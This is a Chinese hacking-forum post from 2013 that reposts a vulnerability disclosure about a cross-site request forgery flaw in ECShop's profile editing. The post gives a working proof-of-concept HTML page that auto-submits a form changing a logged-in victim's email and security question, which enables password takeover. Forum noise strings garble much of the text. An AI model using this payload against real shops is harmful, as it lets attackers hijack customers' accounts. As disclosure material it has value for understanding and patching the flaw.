找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1791|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
5 M3 x: i$ ]) x! q9 g/ pecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
$ X7 [7 f4 d: t' [7 N% Y) @0 O) G, L# F/ I
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
/ Q3 N+ b4 [& S! }5 j; I- s( a7 S' P, I( D6 N: K" @3 L+ o1 q
详细说明:7 X  Z% m# r' G0 U/ s" G1 S. \
利用csrf和xss可以突破官方所说的“障碍”2 e, J3 A! a( N% l5 _5 Z$ b
xss版本已经有人说明2 \. F* S3 I# S/ W4 I
这里给出csrf版本# ~( y7 t$ j" P+ Q5 s
5 H* J( K! y) G1 o" g3 o$ C
漏洞证明:
( z/ H! P+ q( f+ h+ j) f9 S, r<html>
- G3 L$ C' Z; y; {<body>+ {& s2 |" u% _& F$ u
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">0 L0 t( _$ m7 s  f; \. ~- F
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
4 n- [" G9 n% U# \<INPUT TYPE="text" NAME="act" value="act_edit_profile">
9 `: h& D. [/ R  ^; P1 w0 `5 E<INPUT TYPE="text" NAME="sel_question" value="ecshop">
  H* S/ K0 @1 ], p<INPUT TYPE="text" NAME="passwd_answer" value="exploit">" M8 [6 D+ _- m4 W1 g! G( Y
</body>
8 J9 {- ]! V  V& P<script>) E6 H9 r- t* z8 c- I1 @
document.forms[0].submit();  T& G5 G) N) t6 D7 }2 Y6 G
</script>3 g) S" v  z( I" G
</html>
: H1 g: b2 _0 t; d" K. g% h) _构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
. t- d" \' |! w" a0 [: M3 m! {9 l# J
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表